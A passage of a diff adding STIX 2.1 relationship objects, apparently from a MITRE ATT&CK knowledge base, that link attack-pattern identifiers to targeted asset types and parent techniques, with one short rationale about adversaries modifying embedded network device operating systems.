"x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ec076d47-6187-4677-a9c0-c424dc68c622", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ec1ce1c1-89fb-4fa2-98ed-92ad9d3f0ec4", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ec2a9e0e-8c85-486e-8da1-7bfc345e2529", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ec43167f-d778-4c65-bd9e-4b542598f79c", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ec467f15-0f62-483f-a250-da5109e6936a", + "created": "2024-05-22T17:17:26.115Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:35:52.158Z", + "description": "Asset Mapping Rationale: Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.", + "relationship_type": "targets", + "source_ref": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ec7c4df2-0d4e-4e81-8a13-1d0f79fc5241", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ec8d47f5-0eda-416e-aac3-5f2f78afc1df", + "created": "2024-06-27T09:39:57.667Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:39:57.667Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8861073d-d1b8-4941-82ce-dce621d398f0", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ec9c2820-c79d-419a-852e-8beb0ee8fb04", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ec9c9ac6-4e55-42b0-88e7-f8dc52d348e5", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ecaccf03-3fc3-4d52-9834-c7fa2103f896", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ecaf20c0-d881-45b4-98f2-a456e07d3643", + "created": "2023-09-28T21:25:48.379Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:25:48.379Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ecb46558-a463-435b-8a8c-03089021f2ce", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eccf6440-14b6-4e96-95ab-a977a53665c4", + "created": "2024-06-27T08:59:23.241Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:59:23.241Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ecdbe751-ef08-41fe-8c13-27ffaae30312", + "created": "2020-02-05T14:04:26.307Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ecdfe4f5-628d-40b2-b1c5-23402eb298fa", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ece9ec1a-cb2b-46fd-aa63-6735302030b4", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ecea468c-03cd-4811-a91a-0ae7355e7cf1", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ececc146-e1f5-4ba5-b369-e3d06a10557a", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ecf3d7ec-a8f9-435a-9c09-6d264f319728", + "created": "2020-01-24T14:48:05.786Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--4bf5845d-a814-4490-bc5c-ccdee6043025", + "target_ref": "attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ecf72cd3-8c34-4348-baaa-35d4d61a6b00", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ecfb36cb-cd1f-411f-ace3-823e9c225f7f", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ed095993-bc85-431e-9621-437143f16d44", + "created": "2023-09-29T17:44:09.285Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:44:09.285Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ed3ce006-cf41-46f6-bd86-054314c130dc", + "created": "2023-09-28T21:15:57.120Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:15:57.120Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ed3de8e8-e09c-4273-8f68-da5219a7e9ee", + "created": "2021-03-17T20:09:13.260Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--3ee16395-03f0-4690-a32e-69ce9ada0f9e", + "target_ref": "attack-pattern--84771bc3-f6a0-403e-b144-01af70e5fda0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ed3ef546-566a-46c7-918e-7bfa10d05991", + "created": "2023-09-29T17:06:47.370Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:06:47.370Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ed46856f-0f39-48ed-b6ac-6c1d2995212e", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ed48cc70-8cee-4d19-878b-343f3c92f401", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ed4a7a74-cabf-4a11-be44-cbfd898ec06b", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ed641b01-2496-4672-924e-510d72cab667", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ed66e087-8877-4146-a16a-44cfd144a3d8", + "created": "2023-09-29T17:07:00.450Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:07:00.450Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ed68292b-f8de-4c82-ac9b-7bdfae937160", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ed74fda9-7512-4349-a6b6-965b52d27594", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ed8b97e2-5966-4844-a636-524541a46e43", + "created": "2023-09-29T16:39:18.448Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:39:18.448Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ed8df007-8120-4731-9bbc-a97642ad2a5e", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ed8f59b7-c29a-4e2e-925f-038bed391180", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ed9b40ef-51ff-4263-a99e-5c95bae3e17d", + "created": "2020-02-04T13:03:03.632Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--44dca04b-808d-46ca-b25f-d85236d4b9f8", + "target_ref": "attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eda23a3d-a1d0-4e98-85fc-5ac083f53f5c", + "created": "2020-01-13T16:33:20.771Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44", + "target_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--edaa6f5c-1b59-4ecb-a20f-716a61cdaccb", + "created": "2023-09-29T16:39:29.206Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:39:29.206Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + 